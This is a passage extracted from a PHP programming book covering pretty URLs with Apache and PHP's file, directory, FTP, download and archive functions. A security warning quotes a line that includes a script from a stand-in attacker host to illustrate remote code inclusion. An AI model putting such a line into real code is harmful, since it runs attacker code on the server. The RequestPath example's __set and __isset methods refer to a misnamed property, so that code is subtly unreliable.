http://httpd.apache.org/docs/2.0/mod/core.html#acceptpathinfo 15 http://httpd.apache.org/docs/2.0/content-negotiation.html
  • 165. Forms, Tables, and Pretty URLs 141 Now we’re getting something close to our ideal URL. We can obviously rename our PHP file from index.php to something a little more intuitive; for example, by naming it admin.php, we end up with this URL: http://example.org/admin/edit/trackbacks/for/163-My-Example-Page Both of these options are supported by Apache by default, but your ability to set MultiViews in your .htaccess file will depend on your host. Even in this best-case scenario, though, we still end up with an unwanted element in our URL: the real filename, which makes this URL longer and harder to remember than one that doesn’t contain this element. Pretty URLs with mod_rewrite mod_rewrite provides us with a very powerful (and complex) system for getting the exact results we want. However, mod_rewrite is not part of the core Apache server, and while it’s enabled by default on most distributions (and included with the Apache Win32 binary), it may not be available on your server. That’s why this is not the be-all and end-all solution to the problem. The two solutions above are more portable than this one; however, the code we will use to deal with the paths in this solution will work with all three solutions. To use mod_rewrite, we must place something like the following code in an .htaccess file in your web server’s root directory: RewriteEngine On RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule !.(js|ico|gif|jpg|css)$ /index.php [L] The first two RewriteCond statements check that the incoming request doesn’t refer to an existing file or directory. If that’s true, the RewriteRule statement will rewrite the incoming request to a request for /index.php as long as the request does not contain one of the listed filename extensions. Once this code is in place, we can create our ideal URL: http://example.org/edit/trackbacks/for/163-My-Example-Page
  • 166. 142 The PHP Anthology Handling Pretty URLs PHP makes the path information available in the $_SERVER['PATH_INFO'] for the AcceptPathInfo or MultiViews solutions, and in $_SERVER['REQUEST_URI'] when using mod_rewrite. We can handle those paths using a simple PHP class that will extract the path information from the incoming request. We’ll call the class RequestPath and give it a single private property, $parts, to hold all the parts of our request URLs: RequestPath.class.php (excerpt) class RequestPath { private $parts = array(); The actual path parsing happens in the __construct method, which simply explodes the path on the forward slash (/) character and then proceeds to handle the first two path elements as special cases before dealing with the key-value pairs that follow them. The first thing we do is grab the path and trim the trailing / character if there is one: RequestPath.class.php (excerpt) public function __construct() { if (isset($_SERVER['PATH_INFO'])) { $path = (substr($_SERVER['PATH_INFO'], -1) == "/") ? substr($_SERVER['PATH_INFO'], 0, -1) : $_SERVER['PATH_INFO']; } else { $path = (substr($_SERVER['REQUEST_URI'], -1) == "/") ? substr($_SERVER['REQUEST_URI'], 0, -1) : $_SERVER['REQUEST_URI']; } Next, we split the path into an array on the / character. The first element we’ll consider to be the action, the second we’ll consider to be the type:
  • 167. Forms, Tables, and Pretty URLs 143 RequestPath.class.php (excerpt) $bits = explode("/", substr($path, 1)); $parsed['action'] = array_shift($bits); $parsed[] = $parsed['action']; $parsed['type'] = array_shift($bits); $parsed[] = $parsed['type']; The remaining elements we group into key-value pairs. If an odd number of elements remains, we simply place the last element on the end of our key-value array: RequestPath.class.php (excerpt) $parts_size = sizeof($bits); if ($parts_size % 2 != 0) { $parts_size -= 1; } for ($i = 0; $i < $parts_size; $i+=2) { $parsed[$bits[$i]] = $bits[$i+1]; $parsed[] = $bits[$i+1]; } if (sizeof($bits) % 2 != 0) { $parsed[] = array_pop($bits); } Finally, as the last step of our constructor method, we assign our assembled array of path elements to our class’s private $parts array: RequestPath.class.php (excerpt) $this->parts = $parsed; } We can make use of the __get, __set, and __isset magic methods in our RequestPath class, enabling users of the class to get, set, and test the path element values by using the key as if it were a class property, and keeping our class nice and simple:
  • 168. 144 The PHP Anthology RequestPath.class.php (excerpt) public function __get($key) { return $this->parts[$key]; } public function __set($key, $value) { $this->_parts[$key] = $value; } public function __isset($key) { return isset($this->_parts[$key]); } } ?> Using the code is even simpler. Imagine that the incoming request is: http://yourhostname/edit/trackbacks/for/163-My-Example-Page We can access the path information by creating a new RequestPath object: <?php require_once 'RequestPath.class.php'; $request = new RequestPath(); echo "Request action: {$request->action}</br>"; echo "Request type: {$request->type}</br>"; echo "Request for: {$request->for}</br>"; ?> That code should output the following: Request action: edit</br> Request type: trackbacks</br> Request for: 163-My-Example-Page</br> Discussion Once we have pretty URLs set up and functioning, we can start to implement pro­ fessional solution architectures such as the Model-View-Controller architecture, or
  • 169. Forms, Tables, and Pretty URLs 145 MVC.16 Pretty URLs are fast becoming an essential requirement for popular sites and it’s important to think about your URLs carefully, and make them as memor­ able—or as “guessable”—as possible. Summary In this chapter, we’ve explored a number of ways to make building web forms and tables a whole lot easier, in order to free up our time to focus on the aspects of web development that matter. There’s some degree of commonality between every table and every form, yet our roles as developers involve handling the differences—we can automate the common ground, but we need to learn to handle the aspects that make each case unique. This chapter also gave us a chance to experiment with using the Apache web server and some simple PHP to apply pretty URLs in our web ap­ plications. Together, tables, forms, and pretty URLs are common tasks in the working experience of any web developer. The goal of this chapter has been to highlight the aspects of development that we can automate, and to make it easier to handle the parts we can’t. Unfortunately, nothing but experience can make the job easy all the time! 16 http://en.wikipedia.org/wiki/Model-view-controller
  • 171. 6 Chapter Working with Files Databases make great tools for storing information because they’re fast and, with the help of SQL, easy to navigate. Sometimes, though, you need to be able to access the data stored in a file—be it an image, configuration information, or even a web page on a remote server. PHP makes such work easy with its powerful collection of file functions. The only hard part is choosing the right tool for the job! For the sake of demonstration, I’ve saved a copy of the printable version of Pax Dickinson’s article “Top 7 PHP Security Blunders!,”1 which we’ll manipulate with PHP’s file functions. The file is saved as writeSecureScripts.html in this book’s code archive. 1 http://www.sitepoint.com/article/php-security-blunders
  • 172. 148 The PHP Anthology A Word on Security Before you run riot with PHP’s file functions, think carefully about what you’re doing: you will be making files from your operating system available on a web page that will be exposed to the Internet. Check and double-check the code that accesses files—look for holes in your logic that might allow unwanted access to those files. Be particularly careful when allowing files and directories to be identified via URLs, or to be uploaded or downloaded from your site. This warning also extends to PHP’s include commands, which can be used to execute scripts included from a remote web server, for example: include 'http://www.hacker.com/bad_script.txt';. Because of the potential for danger, php.ini settings are available to turn off this functionality. allow_url_fopen = Off is used to disable support for the opening of remote files via URLs to the URL-aware fopen wrappers. As of version 5.2, there’s also the allow_url_include setting, which does the same thing for the include, include_once, require, and require_once functions. If allow_url_fopen is turned off, allow_url_include is automatically turned off as well. I’ll be highlighting the potential dangers with each solution so that, with care, you can learn to write secure code. How do I read a local file? There are as many ways to read a local file as you can think of. In this solution, we’ll discuss a couple of the most popular approaches, but if you wish to continue investigating, check out the relevant manual page.2 Solutions This section covers three options: reading a file as an array, reading a file as a string, and reading a file directly to the screen. 2 http://www.php.net/filesystem/
  • 173. Working with Files 149 Reading a File as an Array First up is PHP’s file function, which reads a file into an array, using the new line character to indicate where a new array element should begin: fileFunc.php (excerpt) <?php $file = file('writeSecureScripts.html'); $lines = count($file); $alt = ''; for ($i=0; $i<$lines; $i++) { $alt = ($alt == 'even') ? 'odd' : 'even'; echo '<div class="' . $alt . '">'; echo $i . ': ' . htmlspecialchars($file[$i]); echo "</div>n"; } ?> Hey, presto! Up pops the file in a nicely formatted page so you can examine it line by line. We simply loop over the $file variable—an array—with our for loop, and display it as we wish. One thing you may have noticed in the above code is that we used a ternary oper­ ator for the alternate row colors in the line after the for loop. A ternary operator takes three arguments and is a shortcut approach to writing a simple if statement. The basic syntax is as follows: (condition) ? true : false The output of our work can be seen in Figure 6.1.
  • 174. 150 The PHP Anthology Figure 6.1. Reading a local file as an array Reading a File as a String As of PHP 4.3, the function called file_get_contents reads a file straight into a string without breaking it up: fileGetFunc.php (excerpt) <?php $file = file_get_contents('writeSecureScripts.html'); $file = strip_tags($file); ?> <form> <textarea> <?php echo htmlspecialchars($file);
  • 175. Working with Files 151 ?> </textarea> </form> The content of the file is now displayed in an HTML textarea stripped of all its HTML tags. The output is depicted in Figure 6.2. Figure 6.2. Reading a local file as a string Reading a File Directly to the Screen Another way to read a local file is to use the readfile function, which fetches the content of the file and displays it directly on the screen: readFileFunc.php (excerpt) <?php readfile('writeSecureScripts.html'); ?>
  • 176. 152 The PHP Anthology This one line of code displays the file exactly as it was found—do not stop at go, do not collect $200. The output is shown in Figure 6.3. Figure 6.3. Reading a local file directly to the screen Discussion readfile is a handy way to safeguard your files and bandwidth. By linking all the files on your web site through a script using the readfile function, you can prevent others from linking directly to them and potentially sapping your web site’s band­ width.3 This approach uses what’s commonly referred to as an “anti-leaching” script. If you bring an authentication system and/or HTTP referrer check into the mix, you’ll have a secure system that ensures that only legitimate visitors to your site can access your files. 3 For an example of how to prevent this kind of pilfering, see “How do I manage file downloads with PHP?”
  • 177. Working with Files 153 How do I use file handles? To use the file functions we saw in the previous solution, you simply need to point them at the file they have to read, using a path that’s relative to the PHP script that executes the function. However, the majority of PHP’s file functions use a slightly different mechanism to access a file—a mechanism that’s very similar to that used to connect to a database. The process uses the fopen function to “connect” and fclose to “disconnect.” The value returned from the fopen function is a PHP file pointer, also known as the handle of the file. Once we have a handle on a file, we can use it to perform a variety of operations on the file, including reading it, append­ ing to it, modifying it, and so on. Solutions This simple example demonstrates how to open and close that “connection” to the file: fileHandle.php (excerpt) <?php $location = 'writeSecureScripts.html'; $fp = fopen($location, 'rb'); ⋮ the file handle $fp is now available fclose($fp); echo $file; ?> When you use fopen to connect to a file, you must specify the path to the file and a mode in which the file is to be accessed (such as r for read-only). The b mode in­ dicator indicates that the file is to be opened in binary mode. As is noted on the manual page for fopen,4 binary mode should always be specified to ensure the portability of your code between operating systems. For more information on the various modes that are available, read the manual page. Handling Small Files Now that we have a file handle, let’s use it to read the file: 4 http://www.php.net/fopen/
  • 178. 154 The PHP Anthology fileHandle.php (excerpt) <?php $location = 'writeSecureScripts.html'; $fp = fopen($location, 'rb'); $file_contents = fread($fp, filesize($location)); fclose($fp); echo $file_contents; ?> This example merely demonstrates file handles in action. Notice that when we use fread, the second argument reflects the amount of data, in bytes, that will be read from the start of the file. For this argument, I’ve used the filesize function, which tells me the total size of the file. Handling Larger Files The previous solution is fine for small files. However, when it’s reading all the contents of a large file, PHP will be forced to fill a lot of memory with those contents, possibly causing a performance issue. To alleviate the potential for this problem, we take a different approach to reading the contents of a large file—we read the file in chunks, and operate on each chunk as we go: fileHandle2.php (excerpt) <?php $fp = fopen('writeSecureScripts.html', 'rb'); while (!feof($fp)) { $chunk = fgets($fp); echo $chunk; } fclose($fp); ?> In our example, the file is opened as normal. Next, to read the contents of the file, we use a while loop, which continues so long as the feof function returns FALSE. feof returns TRUE if the end of the file has been reached, or if there’s an error with the file handle (such as a loss of connection, which can occur with remote files).
  • 179. Working with Files 155 Next, we use fgets to fetch a “chunk” of the file, beginning at the current location and running to the next line-feed character. We get the string back, and fgets moves the internal PHP file pointer for the file handle forward accordingly. Discussion Many more functions are available for reading a file using a file handle. One is fgetss (note the double s), which is almost the same as fgets but strips out any HTML tags it finds in the same way the strip_tags function would. Another is fscanf, which formats the output from the file in the same way printf does. And let’s not forget fgetcsv, which makes handling csv (comma separated values) files a piece of cake. In an idle moment, it’s well worth browsing the file system functions for goodies.5 But if all you wish to do is read the entire contents of a file into a variable, the file and file_get_contents functions are easier to use, and offer potentially better performance. How do I modify a local file? Now that you’ve seen how to read the contents of a file and you’re acquainted with file handles, how about updating files? Again, it’s easy with PHP. Solution Take a look at this code: write.php (excerpt) <?php $lines = file('writeSecureScripts.html'); $fp = fopen('writeSecureScripts.txt', 'w'); foreach ($lines as $line) { $line = strip_tags($line); fwrite($fp, $line); } fclose($fp); echo '<pre>'; 5 http://www.php.net/manual/en/ref.filesystem.php
  • 180. 156 The PHP Anthology echo file_get_contents('writeSecureScripts.txt'); echo '</pre>'; ?> We use the fwrite function to write a string to a file. Take note of the mode we used when we opened the new file with fopen. The mode w will open the file for writing, beginning at the very start of the file and overwriting anything that already exists. If we’d used a instead, the new contents would have been appended to the file, preserving the original contents. In either case, the file will be created if it doesn’t already exist. For a fast, no-nonsense method for writing to a file, investigate the 6 file_put_contents function. It’s identical to calling fopen, fwrite, and fclose, as we saw in “How do I use file handles?”. Discussion Be aware that on a Unix-based web server, PHP will usually run as a user such as www or nobody—an account that has very limited permissions and isn’t owned spe­ cifically by you. Files that are created by PHP will need to be placed in a directory to which that user has write permissions. To make a file or directory readable and writable, use this command: chmod o=rw <directory | file> If you need to execute the file as well (for instance, it’s a PHP script), use the follow­ ing command: chmod o=rwx <directory | file> Protecting Sensitive Files If you use a shared server, making directories readable and writable like this means that other people with accounts on the server will be able to read and modify the contents of those directories. Be careful about the type of information you place in them! Your web host should be able to help you address any security concerns. 6 http://www.php.net/file_put_contents/
  • 181. Working with Files 157 How do I access information about a local file? PHP comes with a range of functions to help you obtain information about a file. Solution In the following example, we use a number of handy functions: ■ file_exists, to check whether the file exists ■ is_file, to check the file is indeed a file and not a directory ■ is_readable, to check whether the file can be read ■ is_writable to check whether the file can be written to ■ filemtime to check the date and time at which the file the file was last modified ■ fileatime to find the date and time the file at which was last accessed ■ filesize to check the file’s size We also wrap the result in some custom code to make it more readable: fileInfo.php (excerpt) <?php // Function to convert a size to bytes to large units function fileSizeUnit($size) { if ($size >= 1073741824) { $size = number_format(($size / 1073741824), 2); $unit = 'GB'; } else if ($size >= 1048576) { $size = number_format(($size / 1048576), 2); $unit = 'MB'; } else if ($size >= 1024) { $size = number_format(($size / 1024), 2); $unit = 'KB'; } else if ($size >= 0)
  • 182. 158 The PHP Anthology { $unit = 'B'; } else { $size = '0'; $unit = 'B'; } return array('size' => $size, 'unit' => $unit); } $file = 'writeSecureScripts.html'; // set the default timezone to use. Available since PHP 5.1 // needed otherwise date() throws an E_STRICT error in v5.2 date_default_timezone_set('UTC'); // Does the file exist if (file_exists($file)) { echo 'Yep: ' . $file . ' exists.<br />'; } else { die('Where has: ' . $file . ' gone!<br />'); } // Is it a file? Could be is_dir() for directory if (is_file($file)) { echo $file . ' is a file<br />'; } // Is it readable if (is_readable($file)) { echo $file . ' can be read<br />'; } // Is it writable if (is_writable($file)) { echo $file . ' can be written to<br />'; }
  • 183. Working with Files 159 // When was it last modified? $modified = date("D d M g:i:s", filemtime($file)); echo $file . ' last modifed at ' . $modified . '<br />'; // When was it last accessed? $accessed = date("D d M g:i:s", fileatime($file)); echo $file . ' last accessed at ' . $accessed . '<br />'; // Use a more convenient file size $size = fileSizeUnit(filesize($file)); // Display the file size echo 'It's ' . $size['size'] . ' ' . $size['unit'] . ' in size.<br />'; ?> Discussion The fileSizeUnit function we used at the start of this code helps to make the result of PHP’s filesize function more readable. PHP keeps a cache of the results of file information functions to improve perform­ ance. Sometimes, though, it will be necessary to clear that cache; we do so using the clearstatcache function. The output of the code above can be seen in Figure 6.4. Figure 6.4. Retrieving file information
  • 184. 160 The PHP Anthology How do I examine directories with PHP? When you’re creating web-based file managers in PHP, it’s handy to be able to explore the contents of directories. Solutions There are two basic approaches to examining directories with PHP—you should use whichever method you prefer.7 Using the readdir Function The first approach, which uses the opendir, readdir, and closedir functions, is similar to the process of using fopen , fread, and fclose to read a file: readdir.php (excerpt) <?php $location = './'; $dp = opendir($location); while ($entry = readdir($dp)) { if (is_dir($location . $entry)) { echo '[Dir] ' . $entry . '<br />'; } else if (is_file($location . $entry)) { echo '[File] ' . $entry . '<br />'; } } closedir($dp); ?> 7 We’ll discuss a third option later in “How do I work with files using the Standard PHP Library in PHP 5?”
  • 185. Working with Files 161 Using the dir Pseudo-Class The alternative approach is to use the dir pseudo-class.8 dir is used in a very similar way to readdir: readdir2.php (excerpt) <?php $location = './'; $dir = dir($location); while ($entry = $dir->read()) { if (is_dir($location . $entry)) { echo '[Dir] ' . $entry . '<br />'; } else if (is_file($location . $entry)) { echo '[File] ' . $entry . '<br />'; } } $dir->close(); ?> How do I display PHP source code online? Sometimes, you might want to display the source of a file. Maybe you’re making the code publicly available, but you don’t want to handle downloads. Or you don’t want to continually update the display page so it remains synchronized with the actual code (after all, you may be continually improving it). As it turns out, being a bit lazy isn’t a crime after all. Solution PHP provides a very handy function for displaying code: highlight_string, which displays PHP code in a presentable manner using the formatting defined in php.ini. 8 dir defines the Directory class—one of the predefined classes that are built into PHP. You can read more about predefined classes on the manual page at http://www.php.net/manual/en/reserved.classes.php.
  • 186. 162 The PHP Anthology Displaying code is even easier with the partner to this function, highlight_file, which can simply be passed the name of the file you want to display: highlight.php (excerpt) <?php // Define an array of allowed files - VERY IMPORTANT! $allowed = array('fileInfo.php', 'fileGetFunc.php', 'fileHandle.php', 'fileHandle2.php'); if (isset($_GET['view']) && in_array($_GET['view'], $allowed)) { highlight_file($_GET['view']); } else { $location = './'; $dir = dir($location); while ($entry = $dir->read()) { if (in_array($entry, $allowed)) { echo '<a href="' . $_SERVER['PHP_SELF'] . '?view=' . $entry . '">' . $entry . "</a><br />n"; } } $dir->close(); } ?> In PHP 4.2.0 or later, if you pass a second argument of TRUE to highlight_string or highlight_file, the function will return the results as a string rather than dis­ playing the file directly. The output from highlight.php is shown in Figure 6.5.
  • 187. Working with Files 163 Figure 6.5. Displaying PHP source code Discussion I take care to allow access only to specified files when I’m displaying either directory contents, or individual file sources. It’s important to be extremely cautious about the way you display your source code, or you may find yourself giving away more than you expected, such as the usernames and passwords used to access a database. Note that hiding code in the interests of security is not what I’m advocating here. Code should be written to be secure in the first place. Hiding code so that no one discovers the holes in it is a recipe for disaster. Eventually someone will find out what you’ve been hiding and—worse still—you’ll probably be ignorant of the fact that they’re exploiting your lax security. How do I store configuration information in a file? Certain information that’s used repeatedly throughout your site (such as passwords, paths, and variables) is best stored in a single file. That way, should you need to move your code to another site, you’ll be able to modify the settings once, rather than hundreds of times throughout your code.
  • 188. 164 The PHP Anthology Solution The easiest way to store configuration information is to create the variables in an .ini file, then include this file in your code using the parse_ini_file function, which parses files that use the same format as php.ini. Here’s an example .ini file: example.ini (excerpt) ; Settings to connect to MySQL [Database_Settings] host=localhost user=littleme pass=secret dbname=world ; Default locations of various files [Locations] css=/home/littleme/myinc/css javascript=/home/littleme/myinc images=/home/littleme/image This script uses the parse_ini_file function to retrieve values from your .ini file: parseini.php (excerpt) <?php $iniVars = parse_ini_file('example.ini', TRUE); echo '<pre>'; print_r($iniVars); echo $iniVars['Locations']['css']; echo '</pre>'; ?> And here’s the output of the script: Array ( [Database_Settings] => Array ( [host] => localhost [user] => littleme [pass] => secret
  • 189. Working with Files 165 [dbname] => world ) [Locations] => Array ( [css] => /home/littleme/myinc/css [javascript] => /home/littleme/myinc [images] => /home/littleme/image ) ) /home/littleme/myinc/css Discussion Using an .ini file to store your configuration information offers some advantages over keeping the information in your PHP files. Sometimes, editing PHP files will make your users nervous—it may be hard for them to see which settings are editable, and it may be possible for them to break your script if they change something they shouldn’t. Also, as the .ini file extension differs from those of your script files, it’s relatively easy to secure all .ini files with a .htaccess that contains a simple directive.9 Configuration File Security Generally speaking, it’s best to not store your configuration file in the web root directory—especially because it usually contains user and password information. Since you can include a file from anywhere within your file system, you might as well play it safe: leave it out of hackers’—and Google’s—reach by placing it outside the web root directory on your server. If you absolutely must store the configuration files in the web root directory, be sure to protect them by including a file directive in your .htaccess file to restrict who may access the files. To make your configuration information absolutely se­ cure, you can always encrypt the sensitive data (perhaps using a tool such as mcrypt).10 9 See http://httpd.apache.org/docs/2.0/mod/core.html#files for more information about file directives. 10 http://www.php.net/mcrypt/
  • 190. 166 The PHP Anthology How do I access a file on a remote server? For the most part, PHP can access files on a remote server over the Internet in almost exactly the same way as it does local files. Solution The fopen function can take a URL instead of a file path as its first argument. In this example, we open a web page as if we’re opening a file: urlFopen.php (excerpt) <?php $fp = fopen('http://www.sitepoint.com/print/758', 'r'); while (!feof($fp)) { $chunk = fgets($fp); echo $chunk; } fclose($fp); ?> Discussion PHP implemented the use of streams in version 4.3.0 as a way to unify file, network, data compression, and other operations into a common set of functions.11 Basically, if you can read the data in a linear fashion, you’re using streams. The ability to handle both remote and local files as streams is built into the various file functions, which certainly makes life easier. The downside is that by allowing the handling of remote files as if they’re local, PHP makes it very easy for you to unwittingly open your site up to security risks.12 11 Learn more about streams at http://www.php.net/stream/. 12 You can set the php.ini file setting allow_url_fopen = Off to disable PHP’s ability to open remote files if you prefer.
  • 191. Working with Files 167 If you choose to not use fopen to open remote files, there are alternatives, including using cURL13 or sockets.14 Neither option is as simple as using fopen, though they achieve the same end. How do I use FTP from PHP? One of the great things about PHP is the sheer amount of functionality that’s either built into it, or is only an extension away. File Transfer Protocol (FTP) is a great example of such functionality. Solutions Here are two popular approaches that you can take to using FTP from PHP. Using PHP’s Built-in FTP Functions You can use PHP’s FTP functionality to have PHP scripts act as clients to an FTP server. This can be useful for countless tasks, whether you’re building a web interface for an FTP file repository, or developing a tool to update your site from your PHP development environment. In order to use the FTP functions, you’ll need to make sure your host has enabled PHP’s FTP functionality. In this example, we use PHP’s FTP functionality to connect to an FTP server and list the files in a directory: ftp.php (excerpt) <?php set_time_limit(0); $ftpServer = 'localhost'; $targetDir = '/'; if (!$fp = ftp_connect($ftpServer, 21, 30)) { die('Connection failed'); } if (!ftp_login($fp, 'anonymous', 'user@domain.com')) { die('Login failed'); } 13 http://www.php.net/curl/ 14 http://www.php.net/sockets/
  • 192. 168 The PHP Anthology if (!ftp_chdir($fp, $targetDir)) { die ('Unable to change directory to: ' . $targetDir); } echo "<pre>Current Directory:" . ftp_pwd($fp) . "nn"; echo "Files Available:n"; $files = ftp_nlist($fp, '/'); foreach ($files as $file) { echo $file . "n"; } echo '</pre>'; ?> Using the PEAR::Net_FTP Class PEAR::NET_FTP is a handy class that ensures data is transferred in the correct mode (that is, ASCII or binary), and solves issues relating to recursive uploads and downloads where we need to transfer a directory and its subdirectories from one system to another. This example uses PEAR::NET_FTP to achieve the same outcome as the previous example: pearftp.php (excerpt) <?php set_time_limit(0); require_once 'NET/FTP.php'; $ftpServer = 'localhost'; $ftpUser = 'anonymous'; $ftpPass = 'user@domain.com'; $localDir = 'import/'; $remoteDir = '/'; $ftp = new Net_FTP(); $ftp->setHostname($ftpServer); $ftp->setUsername($ftpUser); $ftp->setPassword($ftpPass); $ftp->connect(); $ftp->login(); $ftp->getExtensionsFile('extensions.ini'); if ($ftp->getRecursive($remoteDir, $localDir))
  • 193. Working with Files 169 { echo 'Files transfered successfully'; } else { echo 'Transfer failed'; } ?> Note that the getExtensionsFile method of Net_FTP allows you to specify a file that defines particular file extensions, such as .gif and .jpg, as binary or ASCII, ensuring that they will be transferred in the correct manner. The getRecursive method fetches the contents of the specified remote directory, including its subdir­ ectories. Assuming you have permission to place files on the server, you can easily apply the operation in reverse using the putRecursive method. This can be a helpful tool for transferring whole projects between your local development system and your web site, particularly if you’re using PHP from the command line. With the ability to transfer files correctly based on their extension, Net_FTP also makes an excellent choice for individual put and get file operations, as it eliminates the need for you to get the file transfer mode correct. For more information on this PEAR package, see its documentation.15 Discussion When you connect to a normal FTP server by any means, the username and password you provide are sent in clear text to the server. This information can easily be read by malicious parties using a packet sniffer that’s plugged in anywhere between you and the server you’re connecting to. Be sure to change your passwords regularly and, in general, try to avoid FTP when a better alternative is available. If you have SSH access to your site, there are many free SFTP, or SSH File Transfer Protocol, clients that you can use to interact with it.16 15 http://pear.php.net/package/Net_FTP/docs/ 16 Wikipedia provides a list of SFTP clients that makes a good starting point for your research, at http://en.wikipedia.org/wiki/Comparison_of_FTP_clients#Protocol_support.
  • 194. 170 The PHP Anthology How do I manage file downloads with PHP? A fairly common problem faced by developers building sites that will publish files for download is the management of those files. Perhaps some of the files should not be publicly available. Perhaps you only want to deliver the file after visitors have provided their details through a web form. Dealing with downloads may involve more than simply storing your file in a public directory and linking to it from your site. Solution The trick to handling downloads with PHP is to use a few special HTTP headers and the readfile function: download.php (excerpt) <?php $fileName = 'example.ini'; $mimeType = 'application/zip'; if (strpos($_SERVER['HTTP_USER_AGENT'], 'MSIE 5') or strpos($_SERVER['HTTP_USER_AGENT'], 'Opera 7')) { $mimeType = 'application/x-download'; } header('Content-Disposition: attachment; filename=' . $fileName); header('Content-Type: ' . $mimeType); header('Content-Length: ' . filesize($fileName)); readfile($fileName); ?> The Content-Disposition header tells the browser to treat the file as a download (that is, not to display it in the browser window), and gives it the name of the file. The Content-Type header also tells the browser what type of file we’re sending it. In most cases, the Content-Type should match the type of file you’re sending; however, Internet Explorer 5 and Opera browsers have a bad habit of displaying files of recognized types in the browser regardless of the content-disposition header, so we set the MIME type to the made-up value application/x-download for those browsers.
  • 195. Working with Files 171 Finally, the content-length header tells the browser the size of the file, so that it’s able to display a download progress bar. Send HTTP Headers First! Remember that headers must be delivered before any other content is sent to the browser. Be aware that PHP’s output control functions can be helpful here,17 as they let you send pieces of content to the browser in the correct order: you can hold content already sent for output by PHP while letting the headers pass through to the browser. Discussion There’s no perfect solution to this type of problem. Imagine, for example, that people decide to make copies of the images they bought from you and redistribute those copies without your knowing. It’s almost impossible to prevent customers from doing so unless you provide files that have been modified especially for the purpose of distribution—with the addition of watermarks, for example. Though there’s no ideal solution to this problem, it’s important to be aware of some of the different strategies for file distribution: ■ Send the file via email. This is a good option for small files, but email systems can place a limit on the size of files a user can receive, block certain types of files, and operate spam filters that can trap your emails. ■ Provide customers with a unique link that they can use to download the file for a limited time, such as a week. If an attempted download fails (for example, the customers lose their Internet connection during the download), this strategy al­ lows them to try again. A unique, random number can be generated and used in the URL for the download. This number corresponds with an entry in a database, which expires after a specified time. Such an approach will at least limit the number of times the file is downloaded, and should help prevent redistribution of the file via the same URL. 17 http://www.php.net/outcontrol/
  • 196. 172 The PHP Anthology ■ Provide customers with username and password combinations that they can use to log in to the site and download their own files. This approach has proven particularly effective for SitePoint’s online library, where it’s used to distribute SitePoint books in Adobe’s PDF format. The PDF files are secured with the cus­ tomer’s email address. This obviously discourages customers from redistributing the PDF, as it would be obvious which account was used to redistribute the file. As I said, there’s no perfect solution to this problem. However, greater protection can be achieved if some form of security is built into the file that’s being downloaded, such as a password for a document download, a watermark on an image, or a license key for a software package. How do I create compressed ZIP/TAR files with PHP? Perhaps you have a directory that contains many files, or different types of files, as well as subdirectories. There may well be situations in which you need to create a download of the whole directory that preserves its original structure. The typical command-line approach to creating such a download on Unix-based systems is first to create an “archive” file such as a .tar file (.tar files are “Tape Archives” and were originally conceived to help back up a file system onto tape), then compress that file with the gzip or bzip2 utilities. Solutions On a *nix-based system, you’d usually use the tar functionality available through the command line to create these files. Using PHP’s system function, you could execute these commands from a PHP script, assuming your web server had permis­ sion to use the tar and gzip or bzip2 executables. However, your server probably won’t have these permissions, so in this solution, we chose to use the PEAR::Archive_Tar package instead. This package allows you to create archives from data stored in your database, or from nodes in an XML document, as well as to handle basic files.
  • 197. Working with Files 173 Watch Out for E_STRICT Errors The PEAR::Archive_Tar package was originally developed with PHP 4. If you use it in PHP 5 with E_STRICT errors turned on, you’ll receive E_STRICT errors for the deprecated use of references when passing objects. Compressing Simple Files In this example, we create an archive file using the Archive_Tar class and add files to it. Then we do the reverse—extract all the files we added: tar.php (excerpt) <?php require_once 'Archive/Tar.php' ; $tar = new Archive_Tar('demo.tar.gz', 'gz'); $files = array( 'example.ini', 'writeSecureScripts.html' ); $tar->create($files); echo 'Archive created'; $tar2 = new Archive_Tar('demo.tar.gz'); $tar2->extract('demo'); echo 'Archive extracted'; ?> This code is fairly straightforward. When we’re instantiating the class, the second argument to the constructor function tells Archive_Tar which type of compression to use (the alternative to gz, which is used for gzip compression, is bz2, used for bzip2 compression). Simply omit the second argument if you don’t require compres­ sion. The array of filenames needs to be specified when you use the create method, keeping the file paths relative to the location at which the script is executed. And that’s it for file compression! The process of extraction is actually easier. We call the extract method, and provide a path (again, one that’s relative to the location of the script) to indicate the location to which the method should extract the archive—in this case, the subdirectory demo. It’s nice and easy!
  • 198. 174 The PHP Anthology Compressing Database Data Archive_Tar is particularly interesting in that it allows strings to be added to the archive as files. This hypothetical example demonstrates the archiving of a web site’s database of articles—all the articles are retrieved from the database and the body text of each article is stored in a text file with a filename that matches the article’s ID: tar2.php (excerpt) $db = new PDO(DBHOST, DBUSER, DBPASS, DBNAME); $tar = new Archive_Tar('demo/articles.tar.gz', 'gz'); $sql = "SELECT article_id, body FROM articles"; foreach($db->query($sql) as $row) { $tar->addString('articles/' . $row['article_id'] . '.txt', $row['body']); } echo 'Article archive created'; Here, we’ve queried a database using the PDO class available in PHP 5, and used the addString method to add to the archive as files some of the data we fetched. The first argument represents the path and filename under which the string should be stored; the second is the string itself. That should give you a general idea of when Archive_Tar can be useful to you. How do I work with files using the Standard PHP Library in PHP 5? With the release of PHP 5, we were given access to the SPL (Standard PHP Library). The SPL is a library of classes and interfaces designed to solve a variety of standard problems. As you may have guessed, reading directories and getting information about the files they contain is one such problem. The DirectoryIterator class is part of the SPL and is a convenient way to read file directories and retrieve file information. You can also write to the files. Additionally, the DirectoryIterator class has an openFile method that creates a SplFileObject instance for your manipulatory pleasure! Working with the
